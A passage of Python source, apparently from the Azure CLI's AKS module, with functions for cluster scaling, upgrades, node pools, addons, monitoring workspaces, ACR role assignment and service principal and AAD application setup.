raise CLIError('usage error: --reset-aad --aad-client-app-id ID --aad-server-app-id ID '
'--aad-server-app-secret SECRET [--aad-tenant-id ID]')
parameters = {
'clientAppID': aad_client_app_id,
'serverAppID': aad_server_app_id,
'serverAppSecret': aad_server_app_secret,
'tenantID': aad_tenant_id
}
return sdk_no_wait(no_wait,
client.reset_aad_profile,
resource_group_name,
name, parameters)
def aks_scale(cmd, client, resource_group_name, name, node_count, nodepool_name="", no_wait=False):
instance = client.get(resource_group_name, name)
if len(instance.agent_pool_profiles) > 1 and nodepool_name == "":
raise CLIError('There are more than one node pool in the cluster. '
'Please specify nodepool name or use az aks nodepool command to scale node pool')
if node_count == 0:
raise CLIError("Can't scale down to 0 nodes.")
for agent_profile in instance.agent_pool_profiles:
if agent_profile.name == nodepool_name or (nodepool_name == "" and len(instance.agent_pool_profiles) == 1):
agent_profile.count = int(node_count) # pylint: disable=no-member
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
# pylint: disable=inconsistent-return-statements
def aks_update(cmd, client, resource_group_name, name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
min_count=None, max_count=None,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
attach_acr=None,
detach_acr=None,
api_server_authorized_ip_ranges=None,
no_wait=False):
update_autoscaler = enable_cluster_autoscaler + disable_cluster_autoscaler + update_cluster_autoscaler
update_lb_profile = load_balancer_managed_outbound_ip_count is not None or \
load_balancer_outbound_ips is not None or load_balancer_outbound_ip_prefixes is not None
if (update_autoscaler != 1 and not update_lb_profile and
not attach_acr and
not detach_acr and
api_server_authorized_ip_ranges is None):
raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--load-balancer-managed-outbound-ip-count",'
'"--load-balancer-outbound-ips",'
'"--load-balancer-outbound-ip-prefixes",'
'"--attach-acr" or "--dettach-acr",'
'"--"api-server-authorized-ip-ranges')
instance = client.get(resource_group_name, name)
# For multi-agent pool, use the az aks nodepool command
if update_autoscaler > 0 and len(instance.agent_pool_profiles) > 1:
raise CLIError('There are more than one node pool in the cluster. Please use "az aks nodepool" command '
'to update per node pool auto scaler settings')
node_count = instance.agent_pool_profiles[0].count
_validate_autoscaler_update_counts(min_count, max_count, node_count, enable_cluster_autoscaler or
update_cluster_autoscaler)
if enable_cluster_autoscaler:
if instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already enabled for this node pool.\n'
'Please run "az aks --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
instance.agent_pool_profiles[0].enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
raise CLIError('Cluster autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
if disable_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already disabled for this node pool.')
return None
instance.agent_pool_profiles[0].enable_auto_scaling = False
instance.agent_pool_profiles[0].min_count = None
instance.agent_pool_profiles[0].max_count = None
subscription_id = get_subscription_id(cmd.cli_ctx)
client_id = instance.service_principal_profile.client_id
if not client_id:
raise CLIError('Cannot get the AKS cluster\'s service principal.')
if attach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
if detach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=detach_acr,
subscription_id=subscription_id,
detach=True)
load_balancer_profile = _get_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes)
if load_balancer_profile:
instance.network_profile.load_balancer_profile = load_balancer_profile
# empty string is valid as it disables ip whitelisting
if api_server_authorized_ip_ranges is not None:
instance.api_server_access_profile = \
_populate_api_server_access_profile(api_server_authorized_ip_ranges, instance)
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
# pylint: disable=unused-argument,inconsistent-return-statements
def aks_upgrade(cmd, client, resource_group_name, name, kubernetes_version, control_plane_only=False,
no_wait=False, **kwargs):
instance = client.get(resource_group_name, name)
if instance.kubernetes_version == kubernetes_version:
if instance.provisioning_state == "Succeeded":
logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
"will occur when upgrading to the same version if the cluster is not in a failed state.",
instance.kubernetes_version)
elif instance.provisioning_state == "Failed":
logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
"attempt resolution of failed cluster state.", instance.kubernetes_version)
from knack.prompting import prompt_y_n
upgrade_all = False
instance.kubernetes_version = kubernetes_version
vmas_cluster = False
for agent_profile in instance.agent_pool_profiles:
if agent_profile.type.lower() == "availabilityset":
vmas_cluster = True
break
# for legacy clusters, we always upgrade node pools with CCP.
if instance.max_agent_pools < 8 or vmas_cluster:
if control_plane_only:
msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
"upgraded to {} as well. Continue?").format(instance.kubernetes_version)
if not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
if not control_plane_only:
msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
"AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
if not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
"Node pool will not change. Continue?").format(instance.kubernetes_version)
if not prompt_y_n(msg, default="n"):
return None
if upgrade_all:
for agent_profile in instance.agent_pool_profiles:
agent_profile.orchestrator_version = kubernetes_version
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
DEV_SPACES_EXTENSION_NAME = 'dev-spaces'
DEV_SPACES_EXTENSION_MODULE = 'azext_dev_spaces.custom'
def aks_use_dev_spaces(cmd, client, name, resource_group_name, update=False, space_name=None, prompt=False):
"""
Use Azure Dev Spaces with a managed Kubernetes cluster.
:param name: Name of the managed cluster.
:type name: String
:param resource_group_name: Name of resource group. You can configure the default group. \
Using 'az configure --defaults group=<name>'.
:type resource_group_name: String
:param update: Update to the latest Azure Dev Spaces client components.
:type update: bool
:param space_name: Name of the new or existing dev space to select. Defaults to an interactive selection experience.
:type space_name: String
:param prompt: Do not prompt for confirmation. Requires --space.
:type prompt: bool
"""
if _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE, update):
azext_custom = _get_azext_module(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
try:
azext_custom.ads_use_dev_spaces(name, resource_group_name, update, space_name, prompt)
except TypeError:
raise CLIError("Use '--update' option to get the latest Azure Dev Spaces client components.")
except AttributeError as ae:
raise CLIError(ae)
def aks_remove_dev_spaces(cmd, client, name, resource_group_name, prompt=False):
"""
Remove Azure Dev Spaces from a managed Kubernetes cluster.
:param name: Name of the managed cluster.
:type name: String
:param resource_group_name: Name of resource group. You can configure the default group. \
Using 'az configure --defaults group=<name>'.
:type resource_group_name: String
:param prompt: Do not prompt for confirmation.
:type prompt: bool
"""
if _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE):
azext_custom = _get_azext_module(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
try:
azext_custom.ads_remove_dev_spaces(name, resource_group_name, prompt)
except AttributeError as ae:
raise CLIError(ae)
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True):
return sdk_no_wait(no_wait, client.rotate_cluster_certificates, resource_group_name, name)
def _update_addons(cmd, instance, subscription_id, resource_group_name, addons, enable, workspace_resource_id=None,
subnet_name=None, no_wait=False):
# parse the comma-separated addons argument
addon_args = addons.split(',')
addon_profiles = instance.addon_profiles or {}
if 'kube-dashboard' in addon_args and 'kubeDashboard' not in addon_profiles:
addon_profiles['kubeDashboard'] = ManagedClusterAddonProfile(enabled=True)
os_type = 'Linux'
# for each addons argument
for addon_arg in addon_args:
addon = ADDONS[addon_arg]
if addon == 'aciConnector':
# only linux is supported for now, in the future this will be a user flag
addon += os_type
# addon name is case insensitive
addon = next((x for x in addon_profiles.keys() if x.lower() == addon.lower()), addon)
if enable:
# add new addons or update existing ones and enable them
addon_profile = addon_profiles.get(addon, ManagedClusterAddonProfile(enabled=False))
# special config handling for certain addons
if addon == 'omsagent':
if addon_profile.enabled:
raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
'To change monitoring configuration, run "az aks disable-addons -a monitoring"'
'before enabling it again.')
if not workspace_resource_id:
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd,
subscription_id,
resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profile.config = {'logAnalyticsWorkspaceResourceID': workspace_resource_id}
elif addon.lower() == ('aciConnector' + os_type).lower():
if addon_profile.enabled:
raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
'To change virtual-node configuration, run '
'"az aks disable-addons -a virtual-node -g {resource_group_name}" '
'before enabling it again.')
if not subnet_name:
raise CLIError('The aci-connector addon requires setting a subnet name.')
addon_profile.config = {'SubnetName': subnet_name}
addon_profiles[addon] = addon_profile
else:
if addon not in addon_profiles:
raise CLIError("The addon {} is not installed.".format(addon))
addon_profiles[addon].config = None
addon_profiles[addon].enabled = enable
instance.addon_profiles = addon_profiles
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return instance
def _get_azext_module(extension_name, module_name):
try:
# Adding the installed extension in the path
from azure.cli.core.extension.operations import add_extension_to_path
add_extension_to_path(extension_name)
# Import the extension module
from importlib import import_module
azext_custom = import_module(module_name)
return azext_custom
except ImportError as ie:
raise CLIError(ie)
def _handle_addons_args(cmd, addons_str, subscription_id, resource_group_name, addon_profiles=None,
workspace_resource_id=None):
if not addon_profiles:
addon_profiles = {}
addons = addons_str.split(',') if addons_str else []
if 'http_application_routing' in addons:
addon_profiles['httpApplicationRouting'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('http_application_routing')
if 'kube-dashboard' in addons:
addon_profiles['kubeDashboard'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('kube-dashboard')
# TODO: can we help the user find a workspace resource ID?
if 'monitoring' in addons:
if not workspace_resource_id:
# use default workspace if exists else create default workspace
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd, subscription_id, resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profiles['omsagent'] = ManagedClusterAddonProfile(
enabled=True, config={'logAnalyticsWorkspaceResourceID': workspace_resource_id})
addons.remove('monitoring')
# error out if '--enable-addons=monitoring' isn't set but workspace_resource_id is
elif workspace_resource_id:
raise CLIError('"--workspace-resource-id" requires "--enable-addons monitoring".')
# error out if any (unrecognized) addons remain
if addons:
raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
",".join(addons), "are" if len(addons) > 1 else "is"))
return addon_profiles
def _install_dev_spaces_extension(cmd, extension_name):
try:
from azure.cli.core.extension import operations
operations.add_extension(cmd=cmd, extension_name=extension_name)
except Exception: # nopa pylint: disable=broad-except
return False
return True
def _update_dev_spaces_extension(cmd, extension_name, extension_module):
from azure.cli.core.extension import ExtensionNotInstalledException
try:
from azure.cli.core.extension import operations
operations.update_extension(cmd=cmd, extension_name=extension_name)
operations.reload_extension(extension_name=extension_name)
except CLIError as err:
logger.info(err)
except ExtensionNotInstalledException as err:
logger.debug(err)
return False
except ModuleNotFoundError as err:
logger.debug(err)
logger.error("Error occurred attempting to load the extension module. Use --debug for more information.")
return False
return True
def _get_or_add_extension(cmd, extension_name, extension_module, update=False):
from azure.cli.core.extension import (ExtensionNotInstalledException, get_extension)
try:
get_extension(extension_name)
if update:
return _update_dev_spaces_extension(cmd, extension_name, extension_module)
except ExtensionNotInstalledException:
return _install_dev_spaces_extension(cmd, extension_name)
return True
def _ensure_default_log_analytics_workspace_for_monitoring(cmd, subscription_id, resource_group_name):
# mapping for azure public cloud
# log analytics workspaces cannot be created in WCUS region due to capacity limits
# so mapped to EUS per discussion with log analytics team
AzureCloudLocationToOmsRegionCodeMap = {
"australiasoutheast": "ASE",
"australiaeast": "EAU",
"australiacentral": "CAU",
"canadacentral": "CCA",
"centralindia": "CIN",
"centralus": "CUS",
"eastasia": "EA",
"eastus": "EUS",
"eastus2": "EUS2",
"eastus2euap": "EAP",
"francecentral": "PAR",
"japaneast": "EJP",
"koreacentral": "SE",
"northeurope": "NEU",
"southcentralus": "SCUS",
"southeastasia": "SEA",
"uksouth": "SUK",
"usgovvirginia": "USGV",
"westcentralus": "EUS",
"westeurope": "WEU",
"westus": "WUS",
"westus2": "WUS2"
}
AzureCloudRegionToOmsRegionMap = {
"australiacentral": "australiacentral",
"australiacentral2": "australiacentral",
"australiaeast": "australiaeast",
"australiasoutheast": "australiasoutheast",
"brazilsouth": "southcentralus",
"canadacentral": "canadacentral",
"canadaeast": "canadacentral",
"centralus": "centralus",
"centralindia": "centralindia",
"eastasia": "eastasia",
"eastus": "eastus",
"eastus2": "eastus2",
"francecentral": "francecentral",
"francesouth": "francecentral",
"japaneast": "japaneast",
"japanwest": "japaneast",
"koreacentral": "koreacentral",
"koreasouth": "koreacentral",
"northcentralus": "eastus",
"northeurope": "northeurope",
"southafricanorth": "westeurope",
"southafricawest": "westeurope",
"southcentralus": "southcentralus",
"southeastasia": "southeastasia",
"southindia": "centralindia",
"uksouth": "uksouth",
"ukwest": "uksouth",
"westcentralus": "eastus",
"westeurope": "westeurope",
"westindia": "centralindia",
"westus": "westus",
"westus2": "westus2"
}
# mapping for azure china cloud
# currently log analytics supported only China East 2 region
AzureChinaLocationToOmsRegionCodeMap = {
"chinaeast": "EAST2",
"chinaeast2": "EAST2",
"chinanorth": "EAST2",
"chinanorth2": "EAST2"
}
AzureChinaRegionToOmsRegionMap = {
"chinaeast": "chinaeast2",
"chinaeast2": "chinaeast2",
"chinanorth": "chinaeast2",
"chinanorth2": "chinaeast2"
}
# mapping for azure us governmner cloud
AzureFairfaxLocationToOmsRegionCodeMap = {
"usgovvirginia": "USGV"
}
AzureFairfaxRegionToOmsRegionMap = {
"usgovvirginia": "usgovvirginia"
}
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
cloud_name = cmd.cli_ctx.cloud.name
workspace_region = "eastus"
workspace_region_code = "EUS"
# sanity check that locations and clouds match.
if ((cloud_name.lower() == 'azurecloud' and AzureChinaRegionToOmsRegionMap.get(rg_location, False)) or
(cloud_name.lower() == 'azurecloud' and AzureFairfaxRegionToOmsRegionMap.get(rg_location, False))):
raise CLIError('Wrong cloud (azurecloud) setting for region {}, please use "az cloud set ..."'
.format(rg_location))
if ((cloud_name.lower() == 'azurechinacloud' and AzureCloudRegionToOmsRegionMap.get(rg_location, False)) or
(cloud_name.lower() == 'azurechinacloud' and AzureFairfaxRegionToOmsRegionMap.get(rg_location, False))):
raise CLIError('Wrong cloud (azurechinacloud) setting for region {}, please use "az cloud set ..."'
.format(rg_location))
if ((cloud_name.lower() == 'azureusgovernment' and AzureCloudRegionToOmsRegionMap.get(rg_location, False)) or
(cloud_name.lower() == 'azureusgovernment' and AzureChinaRegionToOmsRegionMap.get(rg_location, False))):
raise CLIError('Wrong cloud (azureusgovernment) setting for region {}, please use "az cloud set ..."'
.format(rg_location))
if cloud_name.lower() == 'azurecloud':
workspace_region = AzureCloudRegionToOmsRegionMap.get(rg_location, "eastus")
workspace_region_code = AzureCloudLocationToOmsRegionCodeMap.get(workspace_region, "EUS")
elif cloud_name.lower() == 'azurechinacloud':
workspace_region = AzureChinaRegionToOmsRegionMap.get(rg_location, "chinaeast2")
workspace_region_code = AzureChinaLocationToOmsRegionCodeMap.get(workspace_region, "EAST2")
elif cloud_name.lower() == 'azureusgovernment':
workspace_region = AzureFairfaxRegionToOmsRegionMap.get(rg_location, "usgovvirginia")
workspace_region_code = AzureFairfaxLocationToOmsRegionCodeMap.get(workspace_region, "USGV")
else:
logger.error("AKS Monitoring addon not supported in cloud : %s", cloud_name)
default_workspace_resource_group = 'DefaultResourceGroup-' + workspace_region_code
default_workspace_name = 'DefaultWorkspace-{0}-{1}'.format(subscription_id, workspace_region_code)
default_workspace_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.OperationalInsights' \
'/workspaces/{2}'.format(subscription_id, default_workspace_resource_group, default_workspace_name)
resource_groups = cf_resource_groups(cmd.cli_ctx, subscription_id)
resources = cf_resources(cmd.cli_ctx, subscription_id)
# check if default RG exists
if resource_groups.check_existence(default_workspace_resource_group):
try:
resource = resources.get_by_id(default_workspace_resource_id, '2015-11-01-preview')
return resource.id
except CloudError as ex:
if ex.status_code != 404:
raise ex
else:
resource_groups.create_or_update(default_workspace_resource_group, {'location': workspace_region})
default_workspace_params = {
'location': workspace_region,
'properties': {
'sku': {
'name': 'standalone'
}
}
}
async_poller = resources.create_or_update_by_id(default_workspace_resource_id, '2015-11-01-preview',
default_workspace_params)
ws_resource_id = ''
while True:
result = async_poller.result(15)
if async_poller.done():
ws_resource_id = result.id
break
return ws_resource_id
def _ensure_container_insights_for_monitoring(cmd, addon):
# Workaround for this addon key which has been seen lowercased in the wild.
if 'loganalyticsworkspaceresourceid' in addon.config:
addon.config['logAnalyticsWorkspaceResourceID'] = addon.config.pop('loganalyticsworkspaceresourceid')
workspace_resource_id = addon.config['logAnalyticsWorkspaceResourceID']
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
# extract subscription ID and resource group from workspace_resource_id URL
try:
subscription_id = workspace_resource_id.split('/')[2]
resource_group = workspace_resource_id.split('/')[4]
except IndexError:
raise CLIError('Could not locate resource group in workspace-resource-id URL.')
# region of workspace can be different from region of RG so find the location of the workspace_resource_id
resources = cf_resources(cmd.cli_ctx, subscription_id)
try:
resource = resources.get_by_id(workspace_resource_id, '2015-11-01-preview')
location = resource.location
except CloudError as ex:
raise ex
unix_time_in_millis = int(
(datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds() * 1000.0)
solution_deployment_name = 'ContainerInsights-{}'.format(unix_time_in_millis)
# pylint: disable=line-too-long
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {
"workspaceResourceId": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics Resource ID"
}
},
"workspaceRegion": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics workspace region"
}
},
"solutionDeploymentName": {
"type": "string",
"metadata": {
"description": "Name of the solution deployment"
}
}
},
"resources": [
{
"type": "Microsoft.Resources/deployments",
"name": "[parameters('solutionDeploymentName')]",
"apiVersion": "2017-05-10",
"subscriptionId": "[split(parameters('workspaceResourceId'),'/')[2]]",
"resourceGroup": "[split(parameters('workspaceResourceId'),'/')[4]]",
"properties": {
"mode": "Incremental",
"template": {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {},
"variables": {},
"resources": [
{
"apiVersion": "2015-11-01-preview",
"type": "Microsoft.OperationsManagement/solutions",
"location": "[parameters('workspaceRegion')]",
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"properties": {
"workspaceResourceId": "[parameters('workspaceResourceId')]"
},
"plan": {
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"product": "[Concat('OMSGallery/', 'ContainerInsights')]",
"promotionCode": "",
"publisher": "Microsoft"
}
}
]
},
"parameters": {}
}
}
]
}
params = {
"workspaceResourceId": {
"value": workspace_resource_id
},
"workspaceRegion": {
"value": location
},
"solutionDeploymentName": {
"value": solution_deployment_name
}
}
deployment_name = 'aks-monitoring-{}'.format(unix_time_in_millis)
# publish the Container Insights solution to the Log Analytics workspace
return _invoke_deployment(cmd.cli_ctx, resource_group, deployment_name, template, params,
validate=False, no_wait=False, subscription_id=subscription_id)
def _ensure_aks_acr(cli_ctx,
client_id,
acr_name_or_id,
subscription_id,
detach=False):
from msrestazure.tools import is_valid_resource_id, parse_resource_id
# Check if the ACR exists by resource ID.
if is_valid_resource_id(acr_name_or_id):
try:
parsed_registry = parse_resource_id(acr_name_or_id)
acr_client = cf_container_registry_service(cli_ctx, subscription_id=parsed_registry['subscription'])
registry = acr_client.registries.get(parsed_registry['resource_group'], parsed_registry['name'])
except CloudError as ex:
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
# Check if the ACR exists by name accross all resource groups.
registry_name = acr_name_or_id
registry_resource = 'Microsoft.ContainerRegistry/registries'
try:
registry = get_resource_by_name(cli_ctx, registry_name, registry_resource)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError("ACR {} not found. Have you provided the right ACR name?".format(registry_name))
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
def aks_agentpool_show(cmd, client, resource_group_name, cluster_name, nodepool_name):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
return instance
def aks_agentpool_list(cmd, client, resource_group_name, cluster_name):
return client.list(resource_group_name, cluster_name)
def aks_agentpool_add(cmd, client, resource_group_name, cluster_name, nodepool_name,
kubernetes_version=None,
zones=None,
node_vm_size=None,
node_osdisk_size=0,
node_count=3,
vnet_subnet_id=None,
max_pods=0,
os_type="Linux",
min_count=None,
max_count=None,
enable_cluster_autoscaler=False,
node_taints=None,
no_wait=False):
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name == nodepool_name:
raise CLIError("Node pool {} already exists, please try a different name, "
"use 'aks nodepool list' to get current list of node pool".format(nodepool_name))
taints_array = []
if node_taints is not None:
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
raise CLIError('Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
if node_vm_size is None:
if os_type.lower() == "windows":
raise CLIError('Windows nodepool is not supported')
node_vm_size = "Standard_DS2_v2"
agent_pool = AgentPool(
name=nodepool_name,
count=int(node_count),
vm_size=node_vm_size,
os_type=os_type,
storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
vnet_subnet_id=vnet_subnet_id,
agent_pool_type="VirtualMachineScaleSets",
max_pods=int(max_pods) if max_pods else None,
orchestrator_version=kubernetes_version,
availability_zones=zones,
node_taints=taints_array
)
_check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)
if node_osdisk_size:
agent_pool.os_disk_size_gb = int(node_osdisk_size)
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, agent_pool)
def aks_agentpool_scale(cmd, client, resource_group_name, cluster_name,
nodepool_name,
node_count=3,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
new_node_count = int(node_count)
if new_node_count == 0:
raise CLIError("Can't scale down to 0 nodes.")
if new_node_count == instance.count:
raise CLIError("The new node count is the same as the current node count.")
instance.count = new_node_count # pylint: disable=no-member
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_upgrade(cmd, client, resource_group_name, cluster_name,
kubernetes_version,
nodepool_name,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
instance.orchestrator_version = kubernetes_version
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_update(cmd, client, resource_group_name, cluster_name, nodepool_name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
min_count=None, max_count=None,
no_wait=False):
update_flags = enable_cluster_autoscaler + disable_cluster_autoscaler + update_cluster_autoscaler
if update_flags != 1:
raise CLIError('Please specify "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler"')
instance = client.get(resource_group_name, cluster_name, nodepool_name)
node_count = instance.count
_validate_autoscaler_update_counts(min_count, max_count, node_count, enable_cluster_autoscaler or
update_cluster_autoscaler)
if enable_cluster_autoscaler:
if instance.enable_auto_scaling:
logger.warning('Autoscaler is already enabled for this node pool.\n'
'Please run "az aks nodepool update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.min_count = int(min_count)
instance.max_count = int(max_count)
instance.enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.enable_auto_scaling:
raise CLIError('Autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.min_count = int(min_count)
instance.max_count = int(max_count)
if disable_cluster_autoscaler:
if not instance.enable_auto_scaling:
logger.warning('Autoscaler is already disabled for this node pool.')
return None
instance.enable_auto_scaling = False
instance.min_count = None
instance.max_count = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_delete(cmd, client, resource_group_name, cluster_name,
nodepool_name,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise CLIError("Node pool {} doesnt exist, "
"use 'aks nodepool list' to get current node pool list".format(nodepool_name))
return sdk_no_wait(no_wait, client.delete, resource_group_name, cluster_name, nodepool_name)
def _ensure_aks_acr_role_assignment(cli_ctx,
client_id,
registry_id,
detach=False):
if detach:
if not _delete_role_assignments(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not delete role assignments for ACR. '
'Are you an Owner on this subscription?')
return
if not _add_role_assignment(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not create a role assignment for ACR. '
'Are you an Owner on this subscription?')
return
def _ensure_aks_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
location=None,
name=None):
file_name_aks = 'aksServicePrincipal.json'
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, try to load it from local disk
principal_obj = load_acs_service_principal(subscription_id, file_name=file_name_aks)
if principal_obj:
service_principal = principal_obj.get('service_principal')
client_secret = principal_obj.get('client_secret')
else:
# Nothing to load, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location)
service_principal = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# We don't need to add role assignment for this created SPN
else:
# --service-principal specfied, validate --client-secret was too
if not client_secret:
raise CLIError('--client-secret is required if --service-principal is specified')
store_acs_service_principal(subscription_id, client_secret, service_principal, file_name=file_name_aks)
return load_acs_service_principal(subscription_id, file_name=file_name_aks)
def _ensure_osa_aad(cli_ctx,
aad_client_app_id=None,
aad_client_app_secret=None,
aad_tenant_id=None,
identifier=None,
name=None, create=False,
customer_admin_group_id=None):
rbac_client = get_graph_rbac_management_client(cli_ctx)
if create:
# This reply_url is temporary set since Azure need one to create the AAD.
app_id_name = 'https://{}'.format(name)
if not aad_client_app_secret:
aad_client_app_secret = _create_client_secret()
# Delegate Sign In and Read User Profile permissions on Windows Azure Active Directory API
resource_access = ResourceAccess(id="311a71cc-e848-46a1-bdf8-97ff7156d8e6",
additional_properties=None, type="Scope")
# Read directory permissions on Windows Azure Active Directory API
directory_access = ResourceAccess(id="5778995a-e1bf-45b8-affa-663a9f3f4d04",
additional_properties=None, type="Role")
required_osa_aad_access = RequiredResourceAccess(resource_access=[resource_access, directory_access],
additional_properties=None,
resource_app_id="00000002-0000-0000-c000-000000000000")
list_aad_filtered = list(rbac_client.applications.list(filter="identifierUris/any(s:s eq '{}')"
.format(app_id_name)))
if list_aad_filtered:
aad_client_app_id = list_aad_filtered[0].app_id
# Updating reply_url with the correct FQDN information returned by the RP
reply_url = 'https://{}/oauth2callback/Azure%20AD'.format(identifier)
update_application(client=rbac_client.applications,
object_id=list_aad_filtered[0].object_id,
display_name=name,
identifier_uris=[app_id_name],
reply_urls=[reply_url],
homepage=app_id_name,
password=aad_client_app_secret,
required_resource_accesses=[required_osa_aad_access])
logger.info('Updated AAD: %s', aad_client_app_id)
else:
result = create_application(client=rbac_client.applications,
display_name=name,
identifier_uris=[app_id_name],
homepage=app_id_name,
password=aad_client_app_secret,
required_resource_accesses=[required_osa_aad_access])
aad_client_app_id = result.app_id
